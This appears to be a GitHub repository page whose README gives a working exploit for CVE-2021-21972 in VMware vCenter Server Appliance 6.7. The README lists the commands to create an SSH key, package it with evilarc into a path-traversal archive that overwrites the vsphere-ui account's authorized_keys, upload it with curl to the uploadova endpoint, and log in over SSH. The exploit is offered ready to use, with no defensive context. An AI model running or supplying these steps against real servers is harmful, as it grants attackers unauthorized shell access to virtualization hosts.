Skip to content

renini/CVE-2021-21972

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

CVE-2021-21972

CVE-2021-21972

Tested against VMware VCSA 6.7

create ssh keypair

ssh-keygen -t rsa -f vcsa.key -N ''

create tarbal with ../../../../../home/vsphere-ui/.ssh/authorized_keys

python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova

upload evil.ova to the vropspluginui uploadova rest endpoint

curl -k -A "" --form "uploadFile=@evil.ova;type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"

ssh to vcsa with the added authorized key

ssh -i vcsa.key vsphere-ui@$VCSA_IP

About

CVE-2021-21972

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published